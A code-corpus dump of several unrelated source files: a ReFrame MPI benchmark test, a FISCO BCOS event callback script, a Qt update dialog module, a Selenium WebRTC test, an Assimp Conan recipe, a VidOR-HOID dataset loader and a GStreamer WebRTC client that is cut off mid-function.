2017-11-14T20:37:28.000Z
|
2022-03-31T11:19:18.000Z
|
cscs-checks/microbenchmarks/mpi/halo_exchange/halo_cell_exchange.py
|
CLIP-HPC/reframe
|
eddf0b2508c2ba644e4c3aba5652e57fddfde106
|
[
"BSD-3-Clause"
] | 2,190
|
2017-06-14T12:48:13.000Z
|
2022-03-31T16:09:51.000Z
|
cscs-checks/microbenchmarks/mpi/halo_exchange/halo_cell_exchange.py
|
victorusu/reframe
|
e98078a990e31a47604b06d674e4ee730c22cd44
|
[
"BSD-3-Clause"
] | 83
|
2017-05-29T19:12:16.000Z
|
2022-03-18T09:49:21.000Z
|
# Copyright 2016-2021 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import reframe as rfm
import reframe.utility.sanity as sn
@rfm.simple_test
class HaloCellExchangeTest(rfm.RegressionTest):
def __init__(self):
self.sourcepath = 'halo_cell_exchange.c'
self.build_system = 'SingleSource'
self.build_system.cflags = ['-O2']
self.valid_systems = ['daint:gpu', 'dom:gpu', 'daint:mc', 'dom:mc',
'arolla:cn', 'tsa:cn', 'eiger:mc', 'pilatus:mc']
self.valid_prog_environs = ['PrgEnv-cray', 'PrgEnv-gnu', 'PrgEnv-pgi',
'PrgEnv-nvidia']
self.num_tasks = 6
self.num_tasks_per_node = 1
self.num_gpus_per_node = 0
self.executable_opts = ['input.txt']
self.sanity_patterns = sn.assert_eq(
sn.count(sn.findall(r'halo_cell_exchange', self.stdout)), 9)
self.perf_patterns = {
'time_2_10': sn.extractsingle(
r'halo_cell_exchange 6 2 1 1 10 10 10'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_2_10000': sn.extractsingle(
r'halo_cell_exchange 6 2 1 1 10000 10000 10000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_2_1000000': sn.extractsingle(
r'halo_cell_exchange 6 2 1 1 1000000 1000000 1000000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_4_10': sn.extractsingle(
r'halo_cell_exchange 6 2 2 1 10 10 10'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_4_10000': sn.extractsingle(
r'halo_cell_exchange 6 2 2 1 10000 10000 10000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_4_1000000': sn.extractsingle(
r'halo_cell_exchange 6 2 2 1 1000000 1000000 1000000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_6_10': sn.extractsingle(
r'halo_cell_exchange 6 3 2 1 10 10 10'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_6_10000': sn.extractsingle(
r'halo_cell_exchange 6 3 2 1 10000 10000 10000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_6_1000000': sn.extractsingle(
r'halo_cell_exchange 6 3 2 1 1000000 1000000 1000000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float)
}
self.reference = {
'dom:mc': {
'time_2_10': (3.925395e-06, None, 0.50, 's'),
'time_2_10000': (9.721279e-06, None, 0.50, 's'),
'time_2_1000000': (4.934530e-04, None, 0.50, 's'),
'time_4_10': (5.878997e-06, None, 0.50, 's'),
'time_4_10000': (1.495080e-05, None, 0.50, 's'),
'time_4_1000000': (6.791397e-04, None, 0.50, 's'),
'time_6_10': (5.428815e-06, None, 0.50, 's'),
'time_6_10000': (1.540580e-05, None, 0.50, 's'),
'time_6_1000000': (9.179296e-04, None, 0.50, 's')
},
'daint:mc': {
'time_2_10': (1.5e-05, None, 0.50, 's'),
'time_2_10000': (9.1e-05, None, 0.50, 's'),
'time_2_1000000': (7.9e-04, None, 0.50, 's'),
'time_4_10': (3e-05, None, 0.50, 's'),
'time_4_10000': (1.3e-04, None, 0.50, 's'),
'time_4_1000000': (6.791397e-04, None, 0.50, 's'),
'time_6_10': (3.5e-05, None, 0.50, 's'),
'time_6_10000': (1.2e-04, None, 0.50, 's'),
'time_6_1000000': (9.179296e-04, None, 0.50, 's')
},
'dom:gpu': {
'time_2_10': (3.925395e-06, None, 0.50, 's'),
'time_2_10000': (9.721279e-06, None, 0.50, 's'),
'time_2_1000000': (4.934530e-04, None, 0.50, 's'),
'time_4_10': (5.878997e-06, None, 0.50, 's'),
'time_4_10000': (1.495080e-05, None, 0.50, 's'),
'time_4_1000000': (6.791397e-04, None, 0.50, 's'),
'time_6_10': (5.428815e-06, None, 0.50, 's'),
'time_6_10000': (1.540580e-05, None, 0.50, 's'),
'time_6_1000000': (9.179296e-04, None, 0.50, 's')
},
'daint:gpu': {
'time_2_10': (1.5e-05, None, 0.50, 's'),
'time_2_10000': (9.1e-05, None, 0.50, 's'),
'time_2_1000000': (7.9e-04, None, 0.50, 's'),
'time_4_10': (3e-05, None, 0.50, 's'),
'time_4_10000': (1.3e-04, None, 0.50, 's'),
'time_4_1000000': (6.791397e-04, None, 0.50, 's'),
'time_6_10': (3.5e-05, None, 0.50, 's'),
'time_6_10000': (1.2e-04, None, 0.50, 's'),
'time_6_1000000': (9.179296e-04, None, 0.50, 's')
},
'eiger:mc': {
'time_2_10': (3.46e-06, None, 0.50, 's'),
'time_2_10000': (8.51e-06, None, 0.50, 's'),
'time_2_1000000': (2.07e-04, None, 0.50, 's'),
'time_4_10': (4.46e-06, None, 0.50, 's'),
'time_4_10000': (1.08e-05, None, 0.50, 's'),
'time_4_1000000': (3.55e-04, None, 0.50, 's'),
'time_6_10': (4.53e-06, None, 0.50, 's'),
'time_6_10000': (1.04e-05, None, 0.50, 's'),
'time_6_1000000': (3.55e-04, None, 0.50, 's')
},
'pilatus:mc': {
'time_2_10': (3.46e-06, None, 0.50, 's'),
'time_2_10000': (8.51e-06, None, 0.50, 's'),
'time_2_1000000': (2.07e-04, None, 0.50, 's'),
'time_4_10': (4.46e-06, None, 0.50, 's'),
'time_4_10000': (1.08e-05, None, 0.50, 's'),
'time_4_1000000': (3.55e-04, None, 0.50, 's'),
'time_6_10': (4.53e-06, None, 0.50, 's'),
'time_6_10000': (1.04e-05, None, 0.50, 's'),
'time_6_1000000': (3.55e-04, None, 0.50, 's')
},
}
self.maintainers = ['AJ']
self.strict_check = False
self.tags = {'benchmark'}
@run_before('compile')
def pgi_workaround(self):
if self.current_system.name in ['daint', 'dom']:
if self.current_environ.name == 'PrgEnv-pgi':
self.variables = {
'CUDA_HOME': '$CUDATOOLKIT_HOME',
}
if self.current_environ.name == 'PrgEnv-nvidia':
self.skip_if(self.current_system.name == 'eiger')
self.skip_if(self.current_system.name == 'pilatus')
| 46.788079
| 78
| 0.479264
|
f39573bcdad939b3695a2ff240cd6ace61a22524
| 6,380
|
py
|
Python
|
event_callback.py
|
KyrinCode/python-sdk
|
57dd02388d6b8552ad346d72838c2fd8177fec65
|
[
"MIT"
] | 61
|
2019-07-03T07:40:17.000Z
|
2022-03-06T13:30:53.000Z
|
event_callback.py
|
KyrinCode/python-sdk
|
57dd02388d6b8552ad346d72838c2fd8177fec65
|
[
"MIT"
] | 105
|
2019-07-25T08:48:59.000Z
|
2022-03-23T03:47:34.000Z
|
event_callback.py
|
KyrinCode/python-sdk
|
57dd02388d6b8552ad346d72838c2fd8177fec65
|
[
"MIT"
] | 61
|
2019-07-03T06:58:42.000Z
|
2022-02-16T08:50:14.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
FISCO BCOS/Python-SDK is a python client for FISCO BCOS2.0 (https://github.com/FISCO-BCOS/)
FISCO BCOS/Python-SDK is free software: you can redistribute it and/or modify it under the
terms of the MIT License as published by the Free Software Foundation. This project is
distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Thanks for
authors and contributors of eth-abi, eth-account, eth-hash,eth-keys, eth-typing, eth-utils,
rlp, eth-rlp , hexbytes ... and relative projects
@author: kentzhang
@date: 2019-06
'''
import sys
from client.bcosclient import BcosClient
import os
from client_config import client_config
from client.stattool import StatTool
from client.datatype_parser import DatatypeParser
from client.common.compiler import Compiler
from client_config import client_config
from client.bcoserror import BcosException, BcosError
from client.contractnote import ContractNote
from eth_utils import encode_hex, decode_hex
import uuid
from eth_utils.crypto import keccak
import json
import struct
from utils.encoding import FriendlyJsonSerde
from client.bcoserror import BcosError, ChannelException
from eth_utils import (to_text, to_bytes)
from client.channel_push_dispatcher import ChannelPushHandler
from client.channelpack import ChannelPack
def usage():
usagetext = 'params: [contractname] [address(可以为last)] [event_name] [indexed value(根据event定义,可以为多个)]\n\n'
usagetext = usagetext + "\teg: for contract sample [contracts/HelloEvent.sol], use cmdline:\n\n"
usagetext = usagetext + "\tpython event_callback.py HelloEvent last on_set \n"
usagetext = usagetext + \
"\tpython event_callback.py HelloEvent last on_number 5\n\n...(and other events)"
print(usagetext)
class EventPushHandler01(ChannelPushHandler):
parser = DatatypeParser()
def on_push(self, packmsg: ChannelPack):
print("--------------------EventPushHandler01", packmsg.detail())
strmsg = packmsg.data.decode("utf-8")
response = json.loads(strmsg)
loglist = parser.parse_event_logs(response["logs"])
print("FilterID ", response["filterID"])
print("--------------------EventPushHandler01", json.dumps(loglist, indent=4))
class EventPushHandler02(ChannelPushHandler):
parser = DatatypeParser()
def on_push(self, packmsg: ChannelPack):
print(">>>>>>>>>>>>>>>>>>EventPushHandler02", packmsg.detail())
strmsg = packmsg.data.decode("utf-8")
response = json.loads(strmsg)
loglist = parser.parse_event_logs(response["logs"])
print("FilterID ", response["filterID"])
print(">>>>>>>>>>>>>>>>>>EventPushHandler02", json.dumps(loglist, indent=4))
parser: DatatypeParser = None
client: BcosClient = None
eventHandler01 = EventPushHandler01()
eventHandler02 = EventPushHandler02()
def format_event_register_request(
from_block,
to_block,
addresses,
topics,
groupid="1",
filterid=None):
'''
{
"fromBlock": "latest",
"toBlock": "latest",
"addresses": [
0xca5ed56862869c25da0bdf186e634aac6c6361ee
],
"topics": [
"0x91c95f04198617c60eaf2180fbca88fc192db379657df0e412a9f7dd4ebbe95d"
],
"groupID": "1",
"filterID": "bb31e4ec086c48e18f21cb994e2e5967"
}'''
request = dict()
request["fromBlock"] = from_block
request["toBlock"] = to_block
request["addresses"] = addresses
request["topics"] = topics
request["groupID"] = groupid
if filterid is None:
seq = uuid.uuid1()
filterid = seq.hex
request["filterID"] = filterid
requestJson = FriendlyJsonSerde().json_encode(request)
return requestJson
def register_event_callback(addresses, event_name, indexed_value):
topics = []
topic0 = parser.topic_from_event_name(event_name)
topics.append(topic0)
event_abi = parser.event_name_map[event_name]
print("event abi:", event_abi)
if len(indexed_value) > 0:
indexedinput = []
for input in event_abi["inputs"]:
if input["indexed"] is True:
indexedinput.append((input['name'], input['type']))
print(indexedinput)
i = 0
for v in indexed_value:
itype = indexedinput[i][1]
topic = DatatypeParser.topic_from_type(itype, v)
if not (topic is None):
topics.append(topic)
i = i + 1
requestJson = format_event_register_request("latest", "latest", addresses, topics)
requestbytes = ChannelPack.pack_amop_topic_message("", requestJson)
client.channel_handler.pushDispacher.add_handler(ChannelPack.EVENT_LOG_PUSH, eventHandler01)
client.channel_handler.pushDispacher.add_handler(ChannelPack.EVENT_LOG_PUSH, eventHandler02)
response = client.channel_handler.make_channel_request(requestbytes,
ChannelPack.CLIENT_REGISTER_EVENT_LOG,
ChannelPack.CLIENT_REGISTER_EVENT_LOG)
(topic, result) = ChannelPack.unpack_amop_topic_message(response)
dataobj = json.loads(result)
print(
"after register ,event_name:{},topic:{},result:{}".format(
event_name,
topic,
dataobj['result']))
# abi address event_name indexed_value
def main(argv):
global parser
global client
if len(argv) < 3:
usage()
exit(0)
contractname = argv[0]
address = argv[1]
event_name = argv[2]
indexed_value = argv[3:]
try:
print("usage input {},{},{},{}".format(contractname, address, event_name, indexed_value))
if address == "last":
cn = ContractNote()
address = cn.get_last(contractname)
print("hex address :", address)
abifile = "contracts/" + contractname + ".abi"
parser = DatatypeParser(abifile)
client = BcosClient()
print(client.getinfo())
register_event_callback([address], event_name, indexed_value)
except Exception as e:
import traceback
traceback.print_exc()
client.finish()
import time
time.sleep(0.5)
sys.exit(-1)
if __name__ == "__main__":
main(sys.argv[1:])
| 35.444444
| 109
| 0.670846
|
2c146b5c3b1a1974b34c4daff216ed3881890272
| 4,547
|
py
|
Python
|
pysparkle/frontend/qt.py
|
macdems/pysparkle
|
7d6018e5f2010d6a79fe71bc972bd29c61a113bc
|
[
"MIT"
] | 1
|
2015-12-19T19:25:15.000Z
|
2015-12-19T19:25:15.000Z
|
pysparkle/frontend/qt.py
|
macdems/pysparkle
|
7d6018e5f2010d6a79fe71bc972bd29c61a113bc
|
[
"MIT"
] | null | null | null |
pysparkle/frontend/qt.py
|
macdems/pysparkle
|
7d6018e5f2010d6a79fe71bc972bd29c61a113bc
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015-2016 Maciej Dems <maciej.dems@p.lodz.pl>
# See LICENSE file for copyright information.
import sys
if 'PySide6' in sys.modules:
from PySide6.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec'
elif 'PyQt6' in sys.modules:
from PyQt6.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec'
elif 'PySide2' in sys.modules:
from PySide2.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec_'
elif 'PyQt5' in sys.modules:
from PyQt5.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec_'
else:
if 'PySide' in sys.modules:
from PySide.QtGui import QMessageBox, QLabel, QTextEdit
elif 'PyQt4' in sys.modules:
from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit
else:
raise ImportError("cannot determine Qt bindings: import desired Qt module first")
_exec_attr = 'exec_'
QMessageBox.ButtonRole.YesRole = QMessageBox.YesRole
QMessageBox.ButtonRole.NoRole = QMessageBox.NoRole
QMessageBox.ButtonRole.RejectRole = QMessageBox.RejectRole
QMessageBox.StandardButton.Ok = QMessageBox.Ok
QMessageBox.StandardButton.Yes = QMessageBox.Yes
QMessageBox.StandardButton.No = QMessageBox.No
def ask_for_autocheck(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Question)
dialog.setWindowTitle(dialog.tr("Check for updates automatically?"))
dialog.setText(dialog.tr("Should {} automatically check for updates?").format(pysparkle.appname))
dialog.setInformativeText(dialog.tr("You can always check for updates manually from the menu."))
dialog.setStandardButtons(QMessageBox.StandardButton.Yes | QMessageBox.StandardButton.No)
result = getattr(dialog, _exec_attr)()
return result == QMessageBox.StandardButton.Yes
def update_error(msg=None):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Critical)
dialog.setWindowTitle(dialog.tr("Update Error!"))
dialog.setText(dialog.tr("An error occurred in retrieving update information; "
"are you connected to the internet? Please try again later."))
if msg is not None:
dialog.setDetailedText(msg)
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def no_info(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Warning)
dialog.setWindowTitle(dialog.tr("No update information!"))
dialog.setText(dialog.tr("There is no update information for {}.\n\n"
"Maybe the software is not supported for your operating system...")
.format(pysparkle.appname))
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def no_update(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Information)
dialog.setWindowTitle(dialog.tr("You're up to date!"))
dialog.setText(dialog.tr("{} {} is currently the newest version available.")
.format(pysparkle.appname, pysparkle.appver))
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def update_available(pysparkle, maxitem, items):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Information)
dialog.setWindowTitle(dialog.tr("A new version of {} is available!").format(pysparkle.appname))
dialog.setText(dialog.tr("{} {} is now available (you have {}).\n\nWould you like to download it now?")
.format(pysparkle.appname, maxitem['version'], pysparkle.appver))
if any(item['notes'] for item in items):
grid = dialog.layout()
label = QLabel(dialog.tr("Release notes:"))
grid.addWidget(label, grid.rowCount(), 0, 1, grid.columnCount())
notes = QTextEdit()
notes.setText("<br/>\n".join("<h3>{title}</h3>\n{notes}\n".format(**item) for item in items))
notes.setFixedHeight(200)
notes.setReadOnly(True)
grid.addWidget(notes, grid.rowCount(), 0, 1, grid.columnCount())
dialog.updateGeometry()
get_button = dialog.addButton(dialog.tr("Get update"), QMessageBox.ButtonRole.YesRole)
skip_button = dialog.addButton(dialog.tr("Skip this version"), QMessageBox.ButtonRole.NoRole)
later_button = dialog.addButton(dialog.tr("Remind me later"), QMessageBox.ButtonRole.RejectRole)
getattr(dialog, _exec_attr)()
result = dialog.clickedButton()
if result in (get_button, skip_button):
return result == get_button
| 45.47
| 107
| 0.710798
|
3788d7c3d4ca83cde1621bc7f858b8fc2b420806
| 2,367
|
py
|
Python
|
salt/salt/custom/tests/multi_breakout_test.py
|
stirlab/headless-selenium-test-server
|
0faa49c9bfbc3cc168033134bc1c5e901b086235
|
[
"MIT"
] | 2
|
2017-11-30T08:49:04.000Z
|
2018-05-14T22:49:24.000Z
|
salt/salt/custom/tests/multi_breakout_test.py
|
stirlab/headless-selenium-test-server
|
0faa49c9bfbc3cc168033134bc1c5e901b086235
|
[
"MIT"
] | null | null | null |
salt/salt/custom/tests/multi_breakout_test.py
|
stirlab/headless-selenium-test-server
|
0faa49c9bfbc3cc168033134bc1c5e901b086235
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import signal
import sys
import time
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
import test_common as common
import test_config as config
from user_map import user_map
session_map = {
"webrtc-test.stirlab.local": {
"join_number": 1,
"mute": False,
},
"webrtc-test-base.stirlab.net": {
"join_number": 1,
"mute": False,
},
"webrtc-test-0.stirlab.net": {
"join_number": 1,
"mute": False,
},
"webrtc-test-1.stirlab.net": {
"join_number": 1,
"mute": True,
},
"webrtc-test-2.stirlab.net": {
"join_number": 2,
"mute": False,
},
"webrtc-test-3.stirlab.net": {
"join_number": 2,
"mute": True,
},
"webrtc-test-4.stirlab.net": {
"join_number": 3,
"mute": False,
},
"webrtc-test-5.stirlab.net": {
"join_number": 3,
"mute": True,
},
"webrtc-test-6.stirlab.net": {
"join_number": 4,
"mute": False,
},
"webrtc-test-7.stirlab.net": {
"join_number": 4,
"mute": True,
},
"webrtc-test-8.stirlab.net": {
"join_number": 5,
"mute": False,
},
"webrtc-test-9.stirlab.net": {
"join_number": 5,
"mute": True,
},
}
def usage():
print("Usage: %s" % sys.argv[0])
print("Configuration variables set in test_config.py")
if len(sys.argv) > 2:
usage()
data = None
if len(sys.argv) > 1:
data = sys.argv[1]
def exit_callback():
try:
driver.quit()
except NameError:
print("No driver instance to close")
common.setup_signal_handlers(exit_callback)
hostname = common.hostname_slug()
user_id = None
if hostname in user_map:
user_id = user_map[hostname]["user_id_1"]
else:
print("ERROR: %s does not map to a valid user ID" % hostname)
sys.exit(1)
options = common.setup_chrome()
driver = common.make_driver(options)
main_room_url = common.make_main_room_url(user_id, data)
try:
common.shape_traffic(hostname)
driver.get(main_room_url)
while True:
if not common.global_pause:
common.manage_main_room(driver, True)
common.manage_breakout(driver, session_map[hostname]["join_number"], session_map[hostname]["mute"])
time.sleep(config.page_wait_time)
except WebDriverException as e:
common.clear_traffic_shaping()
print("ERROR: Webdriver error: %s" % e)
# Wait for SIGINT.
signal.pause()
| 21.518182
| 105
| 0.661174
|
8563090ea581688e9772d7c8c3a969d1a7caceb1
| 2,865
|
py
|
Python
|
conanfile.py
|
BentouDev/AssimpConan
|
34b86b571f939b107ef69ef3011e1615ca1b63c9
|
[
"MIT"
] | null | null | null |
conanfile.py
|
BentouDev/AssimpConan
|
34b86b571f939b107ef69ef3011e1615ca1b63c9
|
[
"MIT"
] | null | null | null |
conanfile.py
|
BentouDev/AssimpConan
|
34b86b571f939b107ef69ef3011e1615ca1b63c9
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
import os, platform
assimp_version = os.getenv('ASSIMP_VERSION', '0.0')
assimp_commit = os.getenv('ASSIMP_COMMIT', '')
class AssimpConan(ConanFile):
name = "assimp"
license = "MIT"
url = "https://github.com/BentouDev/AssimpConan"
version = assimp_version
commit = assimp_commit
description = "Assimp conan package"
homepage = "https://github.com/assimp/assimp"
settings = "os", "compiler", "build_type", "arch"
generators = "cmake"
exports_sources = ["assimp-source/*"]
options = {"shared": [True, False]}
default_options = {"shared":"True"}
def source(self):
if platform.system() != "Windows":
return
# This small hack might be useful to guarantee proper /MT /MD linkage in MSVC
# if the packaged project doesn't have variables to set it properly
print (' [*] Injecting conanbuildinfo.cmake...')
tools.replace_in_file("%s/CMakeLists.txt" % ("assimp-source"), "PROJECT( Assimp )",
"""PROJECT( Assimp )
include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)
conan_basic_setup()""")
def build(self):
# Workaround for conan choosing cmake embedded in Visual Studio
if platform.system() == "Windows" and 'AZURE' in os.environ:
cmake_path = '"C:\\Program Files\\CMake\\bin\\cmake.exe"'
print (' [DEBUG] Forcing CMake : ' + cmake_path)
os.environ['CONAN_CMAKE_PROGRAM'] = cmake_path
cmake = CMake(self)
cmake.definitions["ASSIMP_BUILD_TESTS"] = "OFF"
cmake.definitions["ASSIMP_BUILD_SAMPLES"] = "OFF"
cmake.definitions["ASSIMP_BUILD_ASSIMP_TOOLS"] = "OFF"
if self.settings.os == "Windows":
if self.settings.compiler == "gcc":
cmake.definitions["CONAN_CXX_FLAGS"].join("-Wa,-mbig-obj")
#elif self.settings.compiler == "Visual Studio":
# cmake.definitions["CONAN_CXX_FLAGS"].append("/bigobj")
cmake.configure(source_folder = "assimp-source")
cmake.build()
def package(self):
# source code
self.copy("*.h", dst="include", src="assimp-source/include")
self.copy("*.hpp", dst="include", src="assimp-source/include")
self.copy("*.inl", dst="include", src="assimp-source/include")
# generated config.h file
self.copy("*.h", dst="include", src="include")
if self.settings.os == "Windows":
self.copy("*.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
else:
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.dylib", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self, folder="lib")
| 37.207792
| 92
| 0.616056
|
0289e8392361b366bf62daa231a49bc023afe32f
| 3,058
|
py
|
Python
|
dataset/vidor_hoid_mini.py
|
sx14/ST-HOID-helper
|
f0822307fe03548c92dc1e2ef80bb738ed0bd3f5
|
[
"MIT"
] | null | null | null |
dataset/vidor_hoid_mini.py
|
sx14/ST-HOID-helper
|
f0822307fe03548c92dc1e2ef80bb738ed0bd3f5
|
[
"MIT"
] | null | null | null |
dataset/vidor_hoid_mini.py
|
sx14/ST-HOID-helper
|
f0822307fe03548c92dc1e2ef80bb738ed0bd3f5
|
[
"MIT"
] | null | null | null |
import os
import glob
from tqdm import tqdm
from dataset import DatasetV1
class VidOR_HOID(DatasetV1):
"""
VidOR-HOID dataset
"""
def __init__(self, anno_rpath, video_rpath, splits, low_memory=True):
"""
anno_rpath: the root path of annotations
video_rpath: the root path of videos
splits: a list of splits in the dataset to load
low_memory: if true, do not load memory-costly part
of annotations (trajectories) into memory
"""
super(VidOR_HOID, self).__init__(anno_rpath, video_rpath, splits, low_memory)
print('VidOR-HOID-mini dataset loaded. {}'.format('(low memory mode enabled)' if low_memory else ''))
def _get_anno_files(self, split):
anno_files = glob.glob(os.path.join(self.anno_rpath, '{}/*/*.json'.format(split)))
assert len(anno_files)>0, 'No annotation file found for \'{}\'. Please check if the directory is correct.'.format(split)
return anno_files
def get_video_path(self, vid):
return os.path.join(self.video_rpath, self.annos[vid]['video_path'])
if __name__ == '__main__':
"""
To generate a single JSON groundtruth file for specific split and task,
run this script from current directory.
"""
import json
from argparse import ArgumentParser
parser = ArgumentParser(description='Generate a single JSON groundtruth file for VidOR-HOID')
parser.add_argument('--data_root', dest='data_root', type=str,
default='../data/vidor_hoid_mini/vidor-dataset',
help='root dir of dataset')
parser.add_argument('--split', dest='split', choices=['training', 'validation'],
default='validation',
help='which dataset split the groundtruth generated for')
parser.add_argument('--task', dest='task', choices=['obj', 'hoid', 'vrd'],
default='hoid',
help='which task the groundtruth generated for')
args = parser.parse_args()
# to load the trainning set without low memory mode for faster processing, you need sufficient large RAM
anno_root = os.path.join(args.data_root, 'annotation')
video_root = os.path.join(args.data_root, 'video')
dataset = VidOR_HOID(anno_root, video_root, ['validation'], low_memory=True)
index = dataset.get_index(args.split)
if args.split == 'training':
args.split = 'train'
elif args.split == 'validation':
args.split = 'val'
output_path = 'vidor_hoid_mini_%s_%s_gt.json' % (args.task, args.split)
print('Generating %s ...' % output_path)
gts = dict()
for ind in tqdm(index):
if args.task == 'obj':
gt = dataset.get_object_insts(ind)
elif args.task == 'vrd':
gt = dataset.get_relation_insts(ind)
elif args.task == 'hoid':
gt = dataset.get_relation_insts(ind)
gts[ind] = gt
with open(output_path, 'w') as fout:
json.dump(gts, fout, separators=(',', ':'))
| 39.714286
| 128
| 0.630804
|
81f819598f9c996976e2a3babbedc8804e434b39
| 6,716
|
py
|
Python
|
python-gstreamer-webrtc-client/gst-exp/run.py
|
raushanraja/webrtc-example
|
b6ed87a29c4c7837962ac8c849a75823f6bbe471
|
[
"Apache-2.0"
] | null | null | null |
python-gstreamer-webrtc-client/gst-exp/run.py
|
raushanraja/webrtc-example
|
b6ed87a29c4c7837962ac8c849a75823f6bbe471
|
[
"Apache-2.0"
] | null | null | null |
python-gstreamer-webrtc-client/gst-exp/run.py
|
raushanraja/webrtc-example
|
b6ed87a29c4c7837962ac8c849a75823f6bbe471
|
[
"Apache-2.0"
] | null | null | null |
import random
import ssl
import websockets
import asyncio
import os
import sys
import json
import argparse
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
gi.require_version('GstWebRTC', '1.0')
from gi.repository import GstWebRTC
gi.require_version('GstSdp', '1.0')
from gi.repository import GstSdp
PIPELINE_DESC = '''
webrtcbin name=sendrecv bundle-policy=max-bundle
v4l2src ! videoconvert ! queue ! vp8enc deadline=1 ! rtpvp8pay !
queue ! application/x-rtp,media=video,encoding-name=VP8,payload=97 ! sendrecv.
autoaudiosrc ! queue ! opusenc ! rtpopuspay !
queue ! application/x-rtp,media=audio,encoding-name=OPUS,payload=96 ! sendrecv.
'''
class WebRTCClient:
def __init__(self, id_, peer_id, server):
self.id_ = id_
self.conn = None
self.pipe = None
self.webrtc = None
self.peer_id = peer_id
self.server = server or 'wss://298799d45d27.ngrok.io'
async def connect(self):
sslctx = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.conn = await websockets.connect(self.server, ssl=sslctx)
msg = json.dumps({'type': 'ready'})
await self.conn.send(msg)
async def setup_call(self):
await self.conn.send('SESSION {}'.format(self.peer_id))
def send_sdp_offer(self, offer):
text = offer.sdp.as_text()
print ('Sending offer:\n%s' % text)
msg = json.dumps({'type': 'offer', 'data':{'sdp':{'type':'offer','sdp':text}}})
loop = asyncio.new_event_loop()
loop.run_until_complete(self.conn.send(msg))
def on_offer_created(self, promise, _, __):
promise.wait()
reply = promise.get_reply()
offer = reply.get_value('offer')
promise = Gst.Promise.new()
self.webrtc.emit('set-local-description', offer, promise)
promise.interrupt()
self.send_sdp_offer(offer)
def on_negotiation_needed(self, element):
promise = Gst.Promise.new_with_change_func(self.on_offer_created, element, None)
element.emit('create-offer', None, promise)
def send_ice_candidate_message(self, _, mlineindex, candidate):
icemsg = json.dumps({'type':'newIceCandidate', 'data':{'candidate':{'candidate':candidate,'sdpMLineIndex': mlineindex}}})
loop = asyncio.new_event_loop()
loop.run_until_complete(self.conn.send(icemsg))
def on_incoming_decodebin_stream(self, _, pad):
if not pad.has_current_caps():
print (pad, 'has no caps, ignoring')
return
caps = pad.get_current_caps()
name = caps.to_string()
if name.startswith('video'):
q = Gst.ElementFactory.make('queue')
conv = Gst.ElementFactory.make('videoconvert')
sink = Gst.ElementFactory.make('autovideosink')
self.pipe.add(q)
self.pipe.add(conv)
self.pipe.add(sink)
self.pipe.sync_children_states()
pad.link(q.get_static_pad('sink'))
q.link(conv)
conv.link(sink)
elif name.startswith('audio'):
q = Gst.ElementFactory.make('queue')
conv = Gst.ElementFactory.make('audioconvert')
resample = Gst.ElementFactory.make('audioresample')
sink = Gst.ElementFactory.make('autoaudiosink')
self.pipe.add(q)
self.pipe.add(conv)
self.pipe.add(resample)
self.pipe.add(sink)
self.pipe.sync_children_states()
pad.link(q.get_static_pad('sink'))
q.link(conv)
conv.link(resample)
resample.link(sink)
def on_incoming_stream(self, _, pad):
if pad.direction != Gst.PadDirection.SRC:
return
decodebin = Gst.ElementFactory.make('decodebin')
decodebin.connect('pad-added', self.on_incoming_decodebin_stream)
self.pipe.add(decodebin)
decodebin.sync_state_with_parent()
self.webrtc.link(decodebin)
def start_pipeline(self):
self.pipe = Gst.parse_launch(PIPELINE_DESC)
self.webrtc = self.pipe.get_by_name('sendrecv')
self.webrtc.connect('on-negotiation-needed', self.on_negotiation_needed)
self.webrtc.connect('on-ice-candidate', self.send_ice_candidate_message)
self.webrtc.connect('pad-added', self.on_incoming_stream)
self.pipe.set_state(Gst.State.PLAYING)
async def handle_sdp(self, message):
print("\n")
print(message['type'],end="\n\n")
assert (self.webrtc)
msg = message
if message['type'] == 'answer':
sdp = msg['data']['sdp']
# print(sdp)
assert(sdp['type'] == 'answer')
sdp = sdp['sdp']
